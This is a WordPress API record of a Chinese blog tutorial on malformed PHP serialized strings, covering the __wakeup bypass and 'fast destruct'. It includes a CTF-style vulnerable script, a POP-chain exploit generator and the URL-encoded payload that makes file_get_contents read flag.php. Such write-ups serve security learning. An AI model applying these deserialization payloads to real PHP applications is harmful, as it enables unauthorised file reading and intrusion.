{"id":2225,"date":"2025-04-03T23:01:19","date_gmt":"2025-04-03T15:01:19","guid":{"rendered":"http:\/\/gzxingyu.cloud\/?p=2225"},"modified":"2025-04-03T23:01:20","modified_gmt":"2025-04-03T15:01:20","slug":"03-%e7%95%b8%e5%bd%a2%e5%ba%8f%e5%88%97%e5%8c%96%e5%ad%97%e7%ac%a6%e4%b8%b2","status":"publish","type":"post","link":"http:\/\/gzxingyu.cloud\/index.php\/2025\/04\/03\/03-%e7%95%b8%e5%bd%a2%e5%ba%8f%e5%88%97%e5%8c%96%e5%ad%97%e7%ac%a6%e4%b8%b2\/","title":{"rendered":"03.\u7578\u5f62\u5e8f\u5217\u5316\u5b57\u7b26\u4e32"},"content":{"rendered":"

\u4e00\u3001\u6982\u5ff5<\/h1>\n

\u7578\u5f62\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\u5c31\u662f\u6545\u610f\u4fee\u6539\u5e8f\u5217\u5316\u6570\u636e\uff0c\u4f7f\u5176\u4e0e\u6807\u51c6\u5e8f\u5217\u5316\u6570\u636e\u5b58\u5728\u4e2a\u522b\u5b57\u7b26\u7684\u5dee\u5f02\uff0c\u8fbe\u5230\u7ed5\u8fc7\u4e00\u4e9b\u5b89\u5168\u51fd\u6570\u7684\u76ee\u7684\u3002<\/p>\n

\u5e94\u7528\uff1a
\n1.\u7ed5\u8fc7 __wakeup()<\/code>
\n2.\u5feb\u901f\u6790\u6784\uff08fast destruct\uff09\uff1a\u7ed5\u8fc7\u8fc7\u6ee4\u51fd\u6570\uff0c\u63d0\u524d\u6267\u884c__destruct<\/code><\/p>\n

\u4e8c\u3001\u7ed5\u8fc7__wakeup<\/h1>\n

\u7531\u4e8e\u4f7f\u7528unserialize()\u51fd\u6570\u540e\u4f1a\u7acb\u5373\u89e6\u53d1__wakeup<\/code>\uff0c\u4e3a\u4e86\u7ed5\u8fc7__wakeup<\/code>\u4e2d\u7684\u5b89\u5168\u673a\u5236\uff0c\u53ef\u4ee5\u7528\u4fee\u6539\u5c5e\u6027\u6570\u91cf\u7684\u65b9\u5f0f\u7ed5\u8fc7__wakeup<\/code> \u65b9\u6cd5\u3002
\n\u53d7\u5f71\u54cd\u7248\u672c:<\/p>\n

php5.0.0 ~ php5.6.25\nphp7.0.0 ~ php7.0.10\n<\/code><\/pre>\n
\u7ed5\u8fc7\u65b9\u6cd5\uff1a
\n1.\u53cd\u5e8f\u5217\u5316\u65f6\uff0c\u4fee\u6539\u5bf9\u8c61\u7684\u5c5e\u6027\u6570\u91cf\uff0c\u5c06\u539f\u6570\u91cf+n\uff0c\u90a3\u4e48__wakeup<\/code>\u65b9\u6cd5\u5c06\u4e0d\u518d\u8c03\u7528\u3002\u6bd4\u5982:<\/p>\n
\/\/\u6807\u51c6\u5e8f\u5217\u5316\u6570\u636e\n0:4:"Girl":2:{s:4:"name";s:6:"\u5c0f\u7f8e";s:3:"age";s:2:"18";}\n\/\/\u4fee\u6539\u4e3a\uff1a\n0:4:"Gir1":3:{s:4:"names";:6:"\u5c0f\u7f8e";s:3:"age";s:2:"18";}\n<\/code><\/pre>\n
2.\u589e\u52a0\u771f\u5b9e\u5c5e\u6027\u7684\u4e2a\u6570\uff0c\u6bd4\u5982<\/p>\n
\/\/\u539f\u59cb\u5e8f\u5217\u5316\u6570\u636e\n0:4:"Gir1":2:{s:4:"name";s:6:"\u5c0f\u7f8e";s:3:"age";s:2:"18";}\n\/\/\u589e\u52a0\u771f\u5b9e\u5c5e\u6027\u7684\u4e2a\u6570\n0:4:"Gir1":2:{s:4:"name";s:6:"\u5c0f\u7f8e";s:3:"age";s:2:"18";s:1:"n":N;}\n<\/code><\/pre>\n
\u4e09\u3001\u5feb\u901f\u6790\u6784<\/h1>\n
\u5feb\u901f\u6790\u6784\u7684\u539f\u7406\uff1a\u5f53php\u63a5\u6536\u5230\u7578\u5f62\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\u65f6\uff0cPHP\u7531\u4e8e\u5176\u5bb9\u9519\u673a\u5236\uff0c\u4f9d\u7136\u53ef\u4ee5\u53cd\u5e8f\u5217\u5316\u6210\u529f\u3002\u4f46\u662f\uff0c\u7531\u4e8e\u4f60\u7ed9\u7684\u662f\u4e00\u4e2a\u7578\u5f62\u7684\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\uff0c\u603b\u4e4b\u4ed6\u662f\u4e0d\u6807\u51c6\u7684\uff0c\u6240\u4ee5PHP\u5bf9\u8fd9\u4e2a\u7578\u5f62\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\u5f97\u5230\u7684\u5bf9\u8c61\u4e0d\u653e\u5fc3\uff0c\u4e8e\u662fPHP\u5c31\u8981\u8d76\u7d27\u628a\u5b83\u6e05\u7406\u6389\uff0c\u90a3\u4e48\u5c31\u89e6\u53d1\u4e86\u4ed6\u7684\u6790\u6784\u65b9\u6cd5_destruct()<\/code>\u3002<\/p>\n
\u5e94\u7528\u573a\u666f\uff1a\u67d0\u4e9b\u9898\u76ee\u9700\u8981\u5229\u7528__destruct \u624d\u80fd\u83b7\u53d6flag\uff0c\u4f46\u662f_destruct \u662f\u5728\u5bf9\u8c61\u88ab\u9500\u6bc1\u65f6\u624d\u89e6\u53d1\uff08\u6267\u884c\u987a\u5e8f\u592a\u9760\u540e\uff09\uff0c__destruct<\/code> \u4e4b\u524d\u4f1a\u6267\u884c\u8fc7\u6ee4\u51fd\u6570\uff0c\u4e3a\u4e86\u7ed5\u8fc7\u8fd9\u4e9b\u8fc7\u6ee4\u51fd\u6570\uff0c\u5c31\u9700\u8981\u63d0\u524d\u89e6\u53d1__destruct \u65b9\u6cd5\u3002<\/p>\n
\u7578\u5f62\u5b57\u7b26\u4e32\u7684\u6784\u9020\uff1a
\n1.\u6539\u6389\u5c5e\u6027\u7684\u4e2a\u6570
\n2.\u5220\u6389\u7ed3\u5c3e\u7684}<\/code><\/p>\n
\u56db\u3001\u4f8b\u9898<\/h1>\n
<?php\nclass DemoX{\n\tprotected $user;\n\tprotected $sex;\n\tfunction __construct (){\n\t\t$this->user = "guest";\n\t\t$this->sex = "male";\n\t}\n\tfunction __wakeup(){\n\t\t$this->user = "Guest";\n\t\t$this->sex = "female";\n\t}\n\tfunction __toString(){\n\t\treturn "<br>you are".$this->user."your sex is ".$this->sex."<br>";\n\t}\n\tfunction __destruct()\n\t{\n\t\techo $this;\n\t}\n}\nclass Demo2{\n\tprivate $fff14g;\n\tfunction __construct($file){\n\t\t$this->fff14g = $file;\n\t}\n\tfunction __toString(){\n\t\treturn file_get_contents($this->fff14g);\n\t}\n}\nif(!isset($_GET['poc'])){\n\thighlight_file("index. php") ;\n}\nelse{\n\t$user = unserialize($_GET['poc']);\n}\n<\/code><\/pre>\n
\u8d77\u70b9\uff1a$poc\n\n\nDemoX->__destruct   \u4e0d\u89e6\u53d1wakeup\nDemoX->__toString() $user=new Demo2\n\u7ec8\u70b9\uff1aDemo2->__toString $fff14g='flag.php'\n<\/code><\/pre>\n
\u6ce8\u610f\uff1a__construct<\/code>\u00a0\u65b9\u6cd5\u6ca1\u6709\u88ab\u89e6\u53d1\u662f\u56e0\u4e3a\u4f7f\u7528\u4e86\u00a0unserialize<\/code>\u00a0\u51fd\u6570\u6765\u53cd\u5e8f\u5217\u5316\u5bf9\u8c61\uff0c\u800c\u975e\u76f4\u63a5\u5b9e\u4f8b\u5316\u5bf9\u8c61\u3002<\/p>\n
\u89e3\u9898\u601d\u8def\uff1a
\n1.\u660e\u786ePOP\u7684\u8d77\u70b9:unserialize($_GET['poc'])<\/code>
\n2.\u660e\u786ePOP\u7684\u7ec8\u70b9\uff1a Demo2->__toString()<\/code>
\n3.\u600e\u6837\u8fde\u63a5\u8d77\u70b9\u548c\u7ec8\u70b9\uff1f<\/p>\n
Demox->__destruct()\/ \/\u4e0d\u80fd\u6267\u884cDemoX->__wakeup()\nDemoX->__toString()\nDemo2->__toString()\n<\/code><\/pre>\n
4.\u600e\u6837\u6267\u884c\u7ed5\u8fc7 Demox->_wakeup()<\/code>\uff1f\u5148\u751f\u6210\u6b63\u5e38\u7684\u5e8f\u5217\u5316\u6570\u636e\uff0c\u518d\u6539\u53d8\u5c5e\u6027\u4e2a\u6570\u3002<\/p>\n
5.exp:<\/p>\n
<?php  \nclass DemoX{  \n    protected $user;  \n    protected $sex;  \n    function __construct (){  \n       $this->user = new Demo2();  \n       $this->sex = "male";  \n    }  \n\/\/function __wakeup(){  \n\/\/    $this->user = "Guest";  \n\/\/    $this->sex = "female";  \n\/\/}  \n\/\/function __toString(){  \n\/\/    return "<br>you are".$this->user."your sex is ".$this->sex."<br>";  \n\/\/}  \n\/\/function __destruct()  \n\/\/{  \n\/\/    echo $this;  \n\/\/}  \n}  \nclass Demo2{  \n    private $fff14g = 'flag.php';  \n\/\/    function __construct($file){  \n\/\/        $this->fff14g = $file;  \n\/\/    }  \n\/\/    function __toString(){  \n\/\/        return file_get_contents($this->fff14g);  \n\/\/    }  \n}  \n\/\/if(!isset($_GET['poc'])){  \n\/\/    highlight_file("index. php") ;  \n\/\/}  \n\/\/else{  \n\/\/    $user = unserialize($_GET['poc']);  \n\/\/}  \n$d = new DemoX();  \n$poc = serialize($d);  \necho $poc."\\n";  \necho urlencode($poc);\n<\/code><\/pre>\n
6.\u6267\u884c\u5f97\u5230\uff1a<\/p>\n
O:5:"DemoX":2:{s:7:" * user";O:5:"Demo2":1:{s:13:" Demo2 fff14g";s:8:"flag.php";}s:6:" * sex";s:4:"male";}\n\nO%3A5%3A%22DemoX%22%3A2%3A%7Bs%3A7%3A%22%00%2A%00user%22%3BO%3A5%3A%22Demo2%22%3A1%3A%7Bs%3A13%3A%22%00Demo2%00fff14g%22%3Bs%3A8%3A%22flag.php%22%3B%7Ds%3A6%3A%22%00%2A%00sex%22%3Bs%3A4%3A%22male%22%3B%7D\n\n\u901a\u8fc7\u6bd4\u5bf9\uff0c\u5c06\u5c5e\u6027\u4e2a\u6570\u75312\u6539\u4e3a3\nO%3A5%3A%22DemoX%22%3A3%3A%7Bs%3A7%3A%22%00%2A%00user%22%3BO%3A5%3A%22Demo2%22%3A1%3A%7Bs%3A13%3A%22%00Demo2%00fff14g%22%3Bs%3A8%3A%22flag.php%22%3B%7Ds%3A6%3A%22%00%2A%00sex%22%3Bs%3A4%3A%22male%22%3B%7D\n<\/code><\/pre>\n
7.\u5c06payload\u6267\u884c\u83b7\u53d6flag<\/p>\n","protected":false},"excerpt":{"rendered":"
\u4e00\u3001\u6982\u5ff5 \u7578\u5f62\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\u5c31\u662f\u6545\u610f\u4fee\u6539\u5e8f\u5217\u5316\u6570\u636e\uff0c\u4f7f\u5176\u4e0e\u6807\u51c6\u5e8f\u5217\u5316\u6570\u636e\u5b58\u5728\u4e2a\u522b\u5b57\u7b26\u7684\u5dee\u5f02\uff0c\u8fbe\u5230\u7ed5\u8fc7\u4e00\u4e9b\u5b89\u5168\u51fd\u6570 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,21],"tags":[],"class_list":["post-2225","post","type-post","status-publish","format-standard","hentry","category-web","category-21"],"_links":{"self":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/2225","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/comments?post=2225"}],"version-history":[{"count":1,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/2225\/revisions"}],"predecessor-version":[{"id":2226,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/2225\/revisions\/2226"}],"wp:attachment":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/media?parent=2225"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/categories?post=2225"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/tags?post=2225"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}